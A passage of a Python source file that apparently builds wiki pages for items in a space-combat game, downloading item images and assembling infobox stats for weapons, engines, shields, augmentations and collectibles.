    # '_WEAPON' suffix stripped so e.g. PRIMARY_WEAPON maps to the 'Primary' folder.
    itemType = SmallConstants.typeLookup[item['type']].replace('_WEAPON', '').title()
    iconName = item['id']
    if 'iconName' in item and item['iconName']:
        iconName = item['iconName']
    filedir = os.path.join('public', 'images', itemType)
    os.makedirs(filedir, exist_ok=True)
    filepath = os.path.join(filedir, "{}.png".format(iconName))
    if not os.path.exists(filepath):
        # BUG FIX: bind ``url`` before the try block so the error report in
        # the except handler cannot itself raise NameError when
        # GetItemImageUrl() is what failed.
        url = None
        try:
            url = GetItemImageUrl(item)
            r = requests.get(url)
            if r.status_code == 200:
                with open(filepath, 'wb') as f:
                    f.write(r.content)
                if Config.verbose >= 1: print(item['name'], "- Image saved successfully")
                rtnVal = True
            else:
                if Config.verbose >= 1: print("Image not found for item", item['name'])
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are not intercepted; report context, then re-raise.
            print("{} - failed to save the image\nUrl: [{}]\nLocal path [{}]\n\n".format(item['name'], url, filepath))
            raise
    return rtnVal
def UploadImagesToWikiForItemList(itemList):
    """Collect upload/download info for each item and push the images to the wiki."""
    uploadInfoList = []
    for item in itemList:
        uploadInfoList.append(GetImageUploadDownloadInfoForItem(item))
    return WikiUtils.UploadImageListToWiki(uploadInfoList)
def GetDisplayDataForItemList(itemList, headingList):
    """Build one ordered row of HTML stat displays per item, keyed by heading."""
    return [
        OrderedDict(
            (heading, GetHtmlStatDisplayForObject(heading, item))
            for heading in headingList
        )
        for item in itemList
    ]
def GetWikiDisplayDataForItemList(itemList, headingList):
    """Build one ordered row of wiki stat displays per item, keyed by heading."""
    return [
        OrderedDict(
            (heading, GetStatDisplayForObject(heading, item))
            for heading in headingList
        )
        for item in itemList
    ]
def GetStatNameDescriptions(statList, pageType=''):
    """Return the description of each stat name, preserving input order."""
    return [GetDescriptionForItemStatName(statName, pageType) for statName in statList]
def GetItemPageContentForItemRangeList(itemList, existingPageValues=None):
    """
    Render the complete wiki page wikitext for a list of related items.

    :param itemList: items that share one page; the last entry is the primary item
    :param existingPageValues: optional mapping of ItemFormat template fields
        already on the page; entries override the generated defaults.
        BUG FIX: default changed from a shared mutable ``{}`` to ``None``.
    :return: the page wikitext, or '' when itemList is empty
    """
    if not itemList:
        return ''
    if existingPageValues is None:
        existingPageValues = {}
    pageHeader = '__NOTOC__\n'
    pageFooter = '\n{{Template:Equipment}}\n[[Category:Items]]\n'
    primaryItem = itemList[-1]
    nameInfo = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
    itemCatList = GetCategoryListForItem(primaryItem)
    # One category tag per item category, appended to the footer.
    for catName in itemCatList:
        pageFooter += '[[Category:{}]]\n'.format(catName)
    source = GetItemSource(primaryItem)
    sourceClass = GetItemSourceClassName(primaryItem)
    if source is not None and sourceClass:
        source = '<span class="{}">{}</span>'.format(sourceClass, source)
    if sourceClass:
        name = '<span class="{}">{}</span>'.format(sourceClass, nameInfo['fullNameMinusLevel'])
    else:
        name = nameInfo['fullNameMinusLevel']
    infoBox = GetWikiInfoboxDataForItemRangeList(itemList)
    # Generated defaults for the ItemFormat template; caller-supplied
    # values take precedence via the update() below.
    itemTemplateData = OrderedDict()
    itemTemplateData["itemname"] = name
    itemTemplateData["methodOfObtaining"] = source
    itemTemplateData["itemSlot"] = ItemDisplayStatItemType(primaryItem, 'itemPage')
    itemTemplateData["description"] = ''
    itemTemplateData["gameDescription"] = "\n\n".join(GetDescriptionForItemRangeList(itemList, "''"))
    itemTemplateData["functionality"] = ''
    itemTemplateData["interactionsAndStrategy"] = ''
    itemTemplateData["trivia"] = ''
    itemTemplateData.update(existingPageValues)
    content = pageHeader
    content += WikiUtils.ConvertDictionaryToWikiTemplate(infoBox['name'], infoBox['data'])
    content += WikiUtils.ConvertDictionaryToWikiTemplate('ItemFormat', itemTemplateData)
    content += pageFooter
    return content
def GetWikiInfoboxDataForItemRangeList(itemList):
    """
    Build the infobox template name and data for a range of related items.

    :param itemList: items sharing one page; the last entry drives the type
    :return: dict with 'name' (template name or None) and 'data'
        (OrderedDict of template fields, or None when no infobox applies)
    """
    # BUG FIX: the two early returns used a capitalized "Name" key while the
    # normal path -- and callers such as GetItemPageContentForItemRangeList,
    # which reads infoBox['name'] -- use lowercase "name".
    if not itemList:
        return {"name": None, "data": None}
    itemType = SmallConstants.typeLookup[itemList[-1]['type']].replace('_', ' ').title()
    if itemType == "Mineral":
        # Minerals get no infobox.
        return {"name": None, "data": None}
    rtnVal = {
        "name": "Infobox_{}".format(itemType.replace(' ', '')),
        "data": None,
    }
    # Dispatch on item type; each branch fills in the template fields.
    if itemType == "Primary Weapon" or itemType == "Secondary Weapon":
        rtnVal['data'] = GetWikiInfoboxDataForPrimaryOrSecondary(itemList)
    elif itemType == "Engine":
        rtnVal['data'] = GetWikiInfoboxDataForEngine(itemList)
    elif itemType == "Shield":
        rtnVal['data'] = GetWikiInfoboxDataForShield(itemList)
    elif itemType == "Augmentation":
        rtnVal['data'] = GetWikiInfoboxDataForAugmentation(itemList)
    elif itemType == "Collectible":
        rtnVal['data'] = GetWikiInfoboxDataForCollectible(itemList)
    return rtnVal
def GetWikiInfoboxDataForPrimaryOrSecondary(itemList):
    """Build the infobox field dict for a primary or secondary weapon page.

    The last item in *itemList* is treated as the primary (highest) variant;
    multi-variant stats are rendered as "a / b / c" when values differ.
    Returns an OrderedDict of infobox field name -> display string.
    """
    # Template name is Infobox_PrimaryWeapon, Infobox_SecondaryWeapon
    primaryItem = itemList[-1]
    infobox = OrderedDict()
    damageType = GetItemDamageType(primaryItem)
    isBeam = IsBeamWeapon(primaryItem)
    weaponType = SmallConstants.weaponTypeLookup[primaryItem['weaponType']].title()
    splitItemName = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
    source = GetItemSourceExtended(primaryItem, True)
    sourceClass = GetItemSourceClassName(primaryItem)
    # Source and title, wrapped in a styling span when a CSS class applies.
    if source is not None:
        if sourceClass:
            infobox['source'] = '<span class="{}">{}</span>'.format(sourceClass, source)
        else:
            infobox['source'] = source
    if sourceClass:
        infobox['title1'] = '<span class="{}">{}</span>'.format(sourceClass, splitItemName['fullNameMinusLevel'])
    else:
        infobox['title1'] = splitItemName['fullNameMinusLevel']
    image = GetItemWikiImage(primaryItem)
    if image:
        infobox['image1'] = image
    infobox['weapon_type'] = ItemDisplayStatItemType(primaryItem)
    # Required skill; the sentinel 999 means "no requirement" and is hidden.
    vdata = [ GetItemSkillLevel(i) for i in itemList ]
    displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join([str(x) for x in vdata])
    if displayData != '999':
        infobox['required_skill'] = "{} {}".format(GetItemSkillName(primaryItem), displayData)
    # vdata = [ ItemDisplayStatDamage(i, False, False) for i in itemList ]
    # if vdata[0] is not None and str(vdata[0]) != '0':
    #     displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
    #     infobox['damage_per_round'] = displayData
    # Damage: either per round/second or per hit, depending on the weapon.
    if not DisplayDamageAsPerHit(primaryItem):
        vdata = [ GeneralUtils.NumDisplay(GetDamagePerRoundForItem(i), 1) for i in itemList ]
        if vdata[0] != '0':
            if DisplayDamageAsPerSecond(primaryItem):
                vdata = [ '{}/s'.format(i) for i in vdata ]
            displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
            infobox['damage_per_round'] = '{} {}'.format(displayData, GetDamageTypeIconForItem(primaryItem)).strip()
    else:
        vdata = [ GeneralUtils.NumDisplay(GetDamagePerRoundForItem(i), 1) for i in itemList ]
        if vdata[0] != '0':
            vdata = [ '{}/hit'.format(i) for i in vdata ]
            displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
            infobox['damage_per_hit'] = '{} {}'.format(displayData, GetDamageTypeIconForItem(primaryItem)).strip()
    # Hits per second; suppressed when life/hit data is absent or zero.
    with suppress(ZeroDivisionError, TypeError):
        vdata = [ GeneralUtils.NumDisplay(GetItemTotalHitCount(i) / GetItemLife(i), 1) for i in itemList ]
        if vdata[0] != '0':
            displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
            infobox['hits_per_second'] = displayData
    # Fire rate: shown either as "N per sec" or "1 per N sec", whichever
    # form keeps the majority of variant values >= 1.
    with suppress(ZeroDivisionError):
        if weaponType != 'Large':
            vdata = [ GeneralUtils.NumDisplay(i['fireRate'], 1) for i in itemList ]
            aboveOne = 0
            for d in set(vdata):
                aboveOne += 1 if decimal.Decimal(d) >= 1 else 0
            overallUseShotsPerSecond = False
            if aboveOne < len(set(vdata)) - aboveOne:
                overallUseShotsPerSecond = True
                vdata = [ GeneralUtils.NumDisplay(1 / i['fireRate'], 1) for i in itemList ]
            displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join(vdata)
            if displayData != '0':
                if overallUseShotsPerSecond:
                    infobox['fire_rate'] = "{} per sec".format(displayData)
                else:
                    displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join(vdata)
                    infobox['fire_rate'] = "1 per {} sec".format(displayData)
    # Projectile count per volley, only meaningful alongside damage_per_round.
    if 'damage_per_round' in infobox:
        vdata = [ GetNumOfDamagingProjectiles(i, True) for i in itemList ]
        if vdata[-1] > 1:
            displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join([str(v) for v in vdata])
            infobox['amount'] = displayData
    # Total DPS, unless it would duplicate the per-second damage figure.
    if not DisplayDamageAsPerSecond(primaryItem) or 'damage_per_round' not in infobox:
        vdata = [ ItemDisplayStatTotalDps(i, ..., False) for i in itemList ]
        if vdata[0] is not None:
            displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
            if displayData != '0':
                # if GeneralUtils.floatCmp(GetDamagePerRoundForItem(primaryItem), '>', 0):
                #     displayData = '{} {}'.format(displayData, GetDamageTypeIconForItem(primaryItem)).strip()
                # if GeneralUtils.floatCmp(GetItemEffectDamage(primaryItem), '>', 0):
                #     displayData = '{} {}'.format(displayData, GetEffectIconForItem(primaryItem)).strip()
                infobox['damage_per_second'] = displayData
    # Damage type, linked to its category page when one exists.
    damageType = GetDamageTypeForItem(primaryItem)
    if damageType:
        damageTypeCat = GetDamageTypeForItem(primaryItem, True)
        if damageTypeCat:
            infobox['damage_type'] = "[[:Category:Damage:{}|{}]]".format(damageTypeCat, damageType)
        else:
            infobox['damage_type'] = damageType
    # Total damage per volley, suppressed when identical to damage_per_round.
    vdata = [ ItemDisplayStatTotalDamagePerVolley(i, ..., False) for i in itemList ]
    if vdata[0] is not None and vdata[0] != '0':
        displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
        # if GeneralUtils.floatCmp(GetDamagePerRoundForItem(primaryItem), '>', 0):
        #     displayData = '{} {}'.format(displayData, GetDamageTypeIconForItem(primaryItem)).strip()
        # if GeneralUtils.floatCmp(GetItemEffectDamage(primaryItem), '>', 0):
        #     displayData = '{} {}'.format(displayData, GetEffectIconForItem(primaryItem)).strip()
        if 'damage_per_round' not in infobox or infobox['damage_per_round'] != displayData:
            infobox['total_damage_per_volley'] = displayData
    # Energy weapons get damage-per-energy; ammo weapons get ammo counts/cost.
    if primaryItem['energyBased']:
        vdata = [ ItemDisplayStatTotalDpe(i) for i in itemList ]
        if vdata[0] is not None:
            displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
            infobox['damage_per_energy'] = displayData
    if primaryItem['energyBased']:
        vdata = [ GeneralUtils.NumDisplay(i['ammoOrEnergyUsage'], 2) for i in itemList ]
        if vdata[0] != '0':
            displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
            infobox['energy_usage'] = displayData
    else:
        vdata = [ i['ammoOrEnergyUsage'] for i in itemList ]
        if GeneralUtils.floatCmp(vdata[0], '>', 0):
            # Non-large weapons also show the 5x magazine figure in parens.
            if weaponType == 'Large':
                displayData = GeneralUtils.NumDisplay(vdata[0], 0) if len(set(vdata)) == 1 else " / ".join([GeneralUtils.NumDisplay(x, 0) for x in vdata])
            else:
                displayData = "{} ({})".format(GeneralUtils.NumDisplay(vdata[0], 0), GeneralUtils.NumDisplay(vdata[0] * 5, 0)) if len(set(vdata)) == 1 else " / ".join(["{} ({})".format(GeneralUtils.NumDisplay(x, 0), GeneralUtils.NumDisplay(x * 5, 0)) for x in vdata])
            infobox['ammo'] = displayData
            vdata = [ (GeneralUtils.NumDisplay(GetItemAmmoCost(i), 0, True) if GetItemAmmoCost(i) > 0 else None) for i in itemList ]
            if vdata[0] is not None:
                displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
                infobox['ammo_cost'] = displayData
    # Guidance values 1 and 5 require a target lock; presumably homing
    # variants -- TODO confirm guidance enum semantics.
    if primaryItem['guidance'] == 1 or primaryItem['guidance'] == 5:
        infobox['requires_lock'] = 'Yes'
        vdata = [ GeneralUtils.NumDisplay(i['lockingRange'], 1) for i in itemList ]
        displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
        infobox['locking_range'] = '{}su'.format(displayData)
    else:
        infobox['requires_lock'] = 'No'
    if 'locking_range' not in infobox:
        vdata = [ GeneralUtils.NumDisplay(GetItemRange(i), 0) for i in itemList ]
        displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
        if displayData and displayData != '0':
            infobox['range'] = '{}su'.format(displayData)
    if primaryItem['guidance'] != 3:
        vdata = [ GeneralUtils.NumDisplay(GetItemMinRange(i), 1) for i in itemList ]
        displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
        if displayData:
            infobox['min_range'] = '{}su'.format(displayData)
    # Projectile speed/acceleration; not meaningful for beams or Vortex Bombs.
    if not isBeam and 'Vortex Bomb' not in primaryItem['name']:
        vdata = [ GeneralUtils.NumDisplay(GetItemMaxSpeed(i), 1) for i in itemList ]
        if vdata[0] != '0' and vdata[0] != '':
            displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join(vdata)
            infobox['speed'] = "{}su/s".format(displayData)
    if 'speed' in infobox:
        vdata = [ GeneralUtils.NumDisplay(GetItemInitialSpeed(i), 1) for i in itemList ]
        if vdata[0] != '0' and vdata[0] != '':
            displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join(vdata)
            initialSpeedDisplay = "{}su/s".format(displayData)
            if initialSpeedDisplay != infobox['speed']:
                infobox['initial_speed'] = initialSpeedDisplay
    if 'initial_speed' in infobox and GeneralUtils.floatCmp(primaryItem['acceleration'], '>', 0):
        vdata = [ GeneralUtils.NumDisplay(i['acceleration'], 2) for i in itemList ]
        if vdata[0] != '0' and vdata[0] != '':
            displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join(vdata)
            infobox['acceleration'] = "{}su/s/s".format(displayData)
    # Lifetime: most non-large projectiles, plus the listed large weapons;
    # Vortex Bombs use their effect time as the lifetime figure.
    largeWeaponsWithLifetimeList = ['Thunderbomb', 'Tornadian Hurricane', 'Radicane', 'Firestorm', 'Vortex Bomb', 'Ultra Vortex Bomb', 'Anti Vortex Bomb', 'Ghostly Vortex Bomb']
    if not isBeam and (weaponType != 'Large' or primaryItem['name'] in largeWeaponsWithLifetimeList):
        if 'Vortex Bomb' in primaryItem['name']:
            vdata = [ GeneralUtils.NumDisplay(i['effectTime'], 1) for i in itemList ]
        else:
            vdata = [ GeneralUtils.NumDisplay(GetItemLife(i), 1) for i in itemList ]
        if vdata[0] != '0':
            displayData = str(vdata[0]) if len(set(vdata)) == 1 else "s / ".join(vdata)
            infobox['lifetime'] = "{}s".format(displayData)
    if not isBeam and weaponType != 'Mine' and weaponType != 'Proximity':
        vdata = [ GeneralUtils.NumDisplay(i['accuracy'], 1) for i in itemList ]
        displayData = vdata[0] if len(set(vdata)) == 1 else "° / ".join(vdata)
        if weaponType in ['Secondary', 'Primary'] or displayData != '0':
            infobox['accuracy'] = "{}°".format(displayData)
    vdata = [ GeneralUtils.NumDisplay(i['turning'] * Config.turnMultiplier, 1) for i in itemList ]
    if vdata[0] != '0':
        displayData = vdata[0] if len(set(vdata)) == 1 else "° / ".join(vdata)
        infobox['turning'] = "{}°".format(displayData)
    # Arming time: for most large weapons the lifetime doubles as arming time.
    armIsNotLifeExceptionList = ['Thunderbomb', 'Tornadian Hurricane']
    if weaponType == 'Large' and primaryItem['name'] not in armIsNotLifeExceptionList:
        vdata = [ GeneralUtils.NumDisplay(GetItemLife(i), 1) for i in itemList ]
    else:
        vdata = [ GeneralUtils.NumDisplay(i['armingTime'], 1) for i in itemList ]
    displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
    if displayData != '0':
        infobox['arming_time'] = "{}s".format(displayData)
    # Status effects, each linked to its category page.
    effectList = GetEffectNameListForItem(primaryItem)
    if effectList:
        infobox['effect'] = ''
        for effectName in effectList:
            infobox['effect'] += '[[:Category:Effect:{}|{}]]<br>\n'.format(effectName, effectName)
    # Effect duration; a lone zero-duration 'Negative Impact' is hidden.
    if 'effect' in infobox and primaryItem['effectTime'] >= 0:
        if len(effectList) > 1 or effectList[0] != 'Negative Impact' or primaryItem['effectTime'] > 0:
            vdata = [ GeneralUtils.NumDisplay(i['effectTime'], 1) for i in itemList ]
            displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
            infobox['effect_time'] = "{}s".format(displayData)
    vdata = [ ItemDisplayStatBPLocation(i) for i in itemList ]
    if vdata[0]:
        displayData = vdata[0] if len(set(vdata)) == 1 else "<br>\n".join(vdata)
        infobox['blueprint_location'] = displayData
    return infobox
def GetWikiInfoboxDataForEngine(itemList):
    """Build the infobox field dict for an engine page.

    The last item in *itemList* is treated as the primary (highest) variant;
    multi-variant stats are rendered as "a / b" when values differ.
    Returns an OrderedDict of infobox field name -> display string.
    """
    # Template name is Infobox_Engine
    primaryItem = itemList[-1]
    infobox = OrderedDict()
    splitItemName = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
    source = GetItemSourceExtended(primaryItem, True)
    sourceClass = GetItemSourceClassName(primaryItem)
    # Source and title, wrapped in a styling span when a CSS class applies.
    if source is not None:
        if sourceClass:
            infobox['source'] = '<span class="{}">{}</span>'.format(sourceClass, source)
        else:
            infobox['source'] = source
    if sourceClass:
        infobox['title1'] = '<span class="{}">{}</span>'.format(sourceClass, splitItemName['fullNameMinusLevel'])
    else:
        infobox['title1'] = splitItemName['fullNameMinusLevel']
    image = GetItemWikiImage(primaryItem)
    if image:
        infobox['image1'] = image
    # Required skill; the sentinel 999 means "no requirement" and is hidden.
    vdata = [ GetItemSkillLevel(i) for i in itemList ]
    displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join([str(x) for x in vdata])
    if displayData != '999':
        infobox['required_skill'] = "{} {}".format(GetItemSkillName(primaryItem), displayData)
    # Multiplier stats (displayed as "Nx"); zero values are hidden.
    vdata = [ GeneralUtils.NumDisplay(i['maxSpeedMod'], 3) for i in itemList ]
    displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
    if displayData != '0':
        infobox['speed'] = "{}x".format(displayData)
    vdata = [ GeneralUtils.NumDisplay(i['reverseSpeedMod'], 3) for i in itemList ]
    displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
    if displayData != '0':
        infobox['reverse'] = "{}x".format(displayData)
    vdata = [ GeneralUtils.NumDisplay(i['accelMod'], 3) for i in itemList ]
    displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
    if displayData != '0':
        infobox['acceleration'] = "{}x".format(displayData)
    vdata = [ GeneralUtils.NumDisplay(i['turningMod'], 3) for i in itemList ]
    displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
    if displayData != '0':
        infobox['turning'] = "{}x".format(displayData)
    vdata = [ GeneralUtils.NumDisplay(i['propulsionEnhance'], 3) for i in itemList ]
    displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
    infobox['propulsion'] = "{}x".format(displayData)
    # Boost stats are optional fields; suppress(KeyError) skips engines
    # whose records lack them.
    with suppress(KeyError):
        vdata = [ GeneralUtils.NumDisplay(i['propulsionEnhanceTime'], 3) for i in itemList ]
        displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
        if displayData != '0':
            infobox['boost_duration'] = "{}s".format(displayData)
    with suppress(KeyError):
        vdata = [ GeneralUtils.NumDisplay(i['propulsionEnhanceCooldown'] * i['propulsionEnhanceTime'], 2) for i in itemList ]
        displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
        if displayData != '0':
            infobox['boost_cooldown'] = "{}s".format(displayData)
            # A cooldown equal to the duration carries no information;
            # missing boost_duration also lands here via KeyError suppression.
            if infobox['boost_cooldown'] == infobox['boost_duration']:
                del infobox['boost_cooldown']
    # Autopilot speed bonus is additive, hence the "+" prefix.
    vdata = [ GeneralUtils.NumDisplay(i['autoPilotSpeedInc'], 3) for i in itemList ]
    displayData = vdata[0] if len(set(vdata)) == 1 else " / +".join(vdata)
    if displayData != '0':
        infobox['autopilot'] = "+{}".format(displayData)
    vdata = [ ItemDisplayStatBPLocation(i) for i in itemList ]
    if vdata[0]:
        displayData = vdata[0] if len(set(vdata)) == 1 else "<br>\n".join(vdata)
        infobox['blueprint_location'] = displayData
    return infobox
def GetWikiInfoboxDataForShield(itemList):
    """Build the ordered field map for the wiki's Infobox_Shield template.

    itemList holds every level of one shield (ascending); single-valued
    fields come from the highest-level item.  Per-level stats collapse to a
    single value when every level agrees, otherwise they are joined with a
    unit-bearing separator (e.g. "1.2x / 1.4x").
    """
    # Template name is Infobox_Shield
    primaryItem = itemList[-1]
    infobox = OrderedDict()
    splitItemName = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
    source = GetItemSourceExtended(primaryItem, True)
    sourceClass = GetItemSourceClassName(primaryItem)
    if source is not None:
        if sourceClass:
            infobox['source'] = '<span class="{}">{}</span>'.format(sourceClass, source)
        else:
            infobox['source'] = source
    if sourceClass:
        infobox['title1'] = '<span class="{}">{}</span>'.format(sourceClass, splitItemName['fullNameMinusLevel'])
    else:
        infobox['title1'] = splitItemName['fullNameMinusLevel']
    image = GetItemWikiImage(primaryItem)
    if image:
        infobox['image1'] = image
    # Positive icons first, a separating space, then negative icons.
    effectIcons = GetShieldEffectIconsForItem(primaryItem, "positive")
    if effectIcons:
        effectIcons += ' '
    effectIcons += GetShieldEffectIconsForItem(primaryItem, "negative")
    if effectIcons:
        infobox['effect_icons'] = effectIcons
    vdata = [ GetItemSkillLevel(i) for i in itemList ]
    displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join([str(x) for x in vdata])
    if displayData != '999':  # 999 appears to mean "no skill requirement" -- TODO confirm
        infobox['required_skill'] = "{} {}".format(GetItemSkillName(primaryItem), displayData)
    vdata = [ GeneralUtils.NumDisplay(i['maxModifier'], 3) for i in itemList ]
    displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
    if displayData != '0':
        infobox['maximum_charge'] = "{}x".format(displayData)
    vdata = [ GeneralUtils.NumDisplay(i['chargeModifier'], 3) for i in itemList ]
    displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
    if displayData != '0':
        infobox['recharge_rate'] = "{}x".format(displayData)
    vdata = [ GeneralUtils.NumDisplay(i['chargeDelay'], 3) for i in itemList ]
    displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
    infobox['recharge_delay'] = "{}s".format(displayData)
    effectList = GetEffectNameListForItem(primaryItem)
    if effectList:
        # effectAmount is a fraction; display as a whole percentage.
        vdata = [ GeneralUtils.NumDisplay(i['effectAmount'] * 100, 0) for i in itemList ]
        displayData = vdata[0] if len(set(vdata)) == 1 else "% / ".join(vdata)
        if displayData != '0':
            if len(effectList) > 1:
                infobox['effect'] = ''
                for effectName in effectList:
                    infobox['effect'] += '[[:Category:{}|{}]]<br>\n'.format(effectName, effectName)
                infobox['effect'] += '{}%'.format(displayData)
            else:
                infobox['effect'] = "[[:Category:{0}|{0}]] {1}%".format(effectList[0], displayData)
    with suppress(KeyError):
        if primaryItem['resistExtraEffect'] >= 0:
            infobox['additional_resistance'] = "[[:Category:{0}|{0}]]".format(SmallConstants.effectsData[primaryItem['resistExtraEffect']]['name'])
    vdata = [ ItemDisplayStatBPLocation(i) for i in itemList ]
    if vdata[0]:
        displayData = vdata[0] if len(set(vdata)) == 1 else "<br>\n".join(vdata)
        infobox['blueprint_location'] = displayData
    return infobox
def GetWikiInfoboxDataForAugmentation(itemList):
    """Build the ordered field map for the wiki's Infobox_Augmentation template.

    itemList holds every level of one augmentation (ascending); single-valued
    fields come from the highest-level item.
    """
    # Template name is Infobox_Augmentation
    primaryItem = itemList[-1]
    infobox = OrderedDict()
    splitItemName = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
    source = GetItemSourceExtended(primaryItem, True)
    sourceClass = GetItemSourceClassName(primaryItem)
    if source is not None:
        if sourceClass:
            infobox['source'] = '<span class="{}">{}</span>'.format(sourceClass, source)
        else:
            infobox['source'] = source
    if sourceClass:
        infobox['title1'] = '<span class="{}">{}</span>'.format(sourceClass, splitItemName['fullNameMinusLevel'])
    else:
        infobox['title1'] = splitItemName['fullNameMinusLevel']
    image = GetItemWikiImage(primaryItem)
    if image:
        infobox['image1'] = image
    vdata = [ GetItemSkillLevel(i) for i in itemList ]
    displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join([str(x) for x in vdata])
    if displayData != '999':  # 999 appears to mean "no skill requirement" -- TODO confirm
        infobox['required_skill'] = "{} {}".format(GetItemSkillName(primaryItem), displayData)
    effectList = GetEffectNameListForItem(primaryItem)
    if effectList:
        infobox['effect'] = ''
        for effectName in effectList:
            infobox['effect'] += '[[:Category:Effect:{}|{}]]<br>\n'.format(effectName, effectName)
    # Best-effort: items without an effectTime key simply omit the field.
    try:
        if 'effect' in infobox and primaryItem['effectTime'] >= 0:
            vdata = [ GeneralUtils.NumDisplay(i['effectTime'], 1) for i in itemList ]
            displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
            infobox['effect_time'] = "{}s".format(displayData)
    except:
        pass
    vdata = [ ItemDisplayStatBPLocation(i) for i in itemList ]
    if vdata[0]:
        displayData = vdata[0] if len(set(vdata)) == 1 else "<br>\n".join(vdata)
        infobox['blueprint_location'] = displayData
    return infobox
def GetWikiInfoboxDataForCollectible(itemList):
    """Build the ordered field map for the wiki's Infobox_Collectible template.

    itemList holds every level of the collectible; single-valued fields come
    from the highest-level item.
    """
    # Template name is Infobox_Collectible
    primaryItem = itemList[-1]
    infobox = OrderedDict()
    splitItemName = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
    source = GetItemSourceExtended(primaryItem, True)
    sourceClass = GetItemSourceClassName(primaryItem)
    if source is not None:
        if sourceClass:
            infobox['source'] = '<span class="{}">{}</span>'.format(sourceClass, source)
        else:
            infobox['source'] = source
    if sourceClass:
        infobox['title1'] = '<span class="{}">{}</span>'.format(sourceClass, splitItemName['fullNameMinusLevel'])
    else:
        infobox['title1'] = splitItemName['fullNameMinusLevel']
    image = GetItemWikiImage(primaryItem)
    if image:
        infobox['image1'] = image
    bpLoc = ItemDisplayStatBPLocation(primaryItem)
    if bpLoc:
        # BUG FIX: previously assigned `image` here (copy-paste from the
        # image1 block), clobbering the field with the image name.  The
        # blueprint location text is what belongs here (cf. the shield /
        # augmentation builders).
        infobox['blueprint_location'] = bpLoc
    return infobox
def GetItemShieldEffect(item, includeEffectLevel=False):
    # NOTE(review): this helper computes the effect display name but never
    # returns it -- the function always returns None and the
    # includeEffectLevel parameter is unused.  It looks vestigial or
    # unfinished (a `return effect` seems intended); confirm with callers
    # before relying on it or "fixing" it.
    try:
        # Non-shield check (type 5) plus a positive effect id -- presumably
        # type 5 is the shield type in SmallConstants.typeLookup; verify.
        if item['type'] != 5 and item['effect'] > 0:
            effect = SmallConstants.effectLookup[item['effect']].replace('_', ' ').title()
    except:
        pass
def IsItemHidden(item):
    """Return True when the item should not appear on the wiki.

    An item is hidden when its race is in the unreleased-race list, or when
    its id is explicitly blacklisted in itemIdListToSkip.
    """
    with suppress(KeyError):
        hiddenByRace = GetRaceForItem(item) in Config.unreleasedRaceList
        if hiddenByRace:
            return True
    return item['id'] in itemIdListToSkip
def IsItemNprExclusive(item):
    """Return True when the item is reserved for NPRs (non-player races).

    An item qualifies when its race's data lists it under 'dontUse' or
    'omitFromLoot', or when its equip category marks it Ultra Rare.  All
    lookups are best-effort: any missing key simply skips that check.
    """
    for exclusionKey in ('dontUse', 'omitFromLoot'):
        try:
            if item['race'] > 1 and item['id'] in SmallConstants.raceData[item['race']][exclusionKey]:
                return True
        except:
            pass
    try:
        if item['equipCategory'] == 7:  # Ultra Rare
            return True
    except:
        pass
    return False
def GetDamagePerRoundForItem(item):
    """Damage dealt by a single round/hit of the item.

    Resolution order: per-name override from Config; continuous-damage total
    spread over the projectile lifetime; the sub-weapon's value; finally the
    item's own 'damage' key (None when absent).
    """
    with suppress(AttributeError, KeyError):
        return Config.weaponDamagePerHitOverride[item['name']]
    continuousTotal = GetItemContinuousDamageTotalDamage(item)
    if continuousTotal:
        # Continuous damage is expressed per second of projectile life.
        return continuousTotal / GetItemLife(item)
    sub = GetItemSubWeapon(item)
    if sub:
        return GetDamagePerRoundForItem(sub)
    with suppress(KeyError):
        return item['damage']
def GetAllItemsSharingItemRange(item, funcItemList=...):
    """Return all items in the same level range as *item*.

    Prefers the explicit range table; falls back to grouping by base name
    (name minus the level token); returns [item] when nothing else matches.
    funcItemList restricts the candidate pool (defaults to all items).
    """
    if funcItemList is ...:
        funcItemList = itemData
    rangeData = GetRangeDataForItem(item, True)  # True: skip variant ids
    with suppress(KeyError, TypeError):
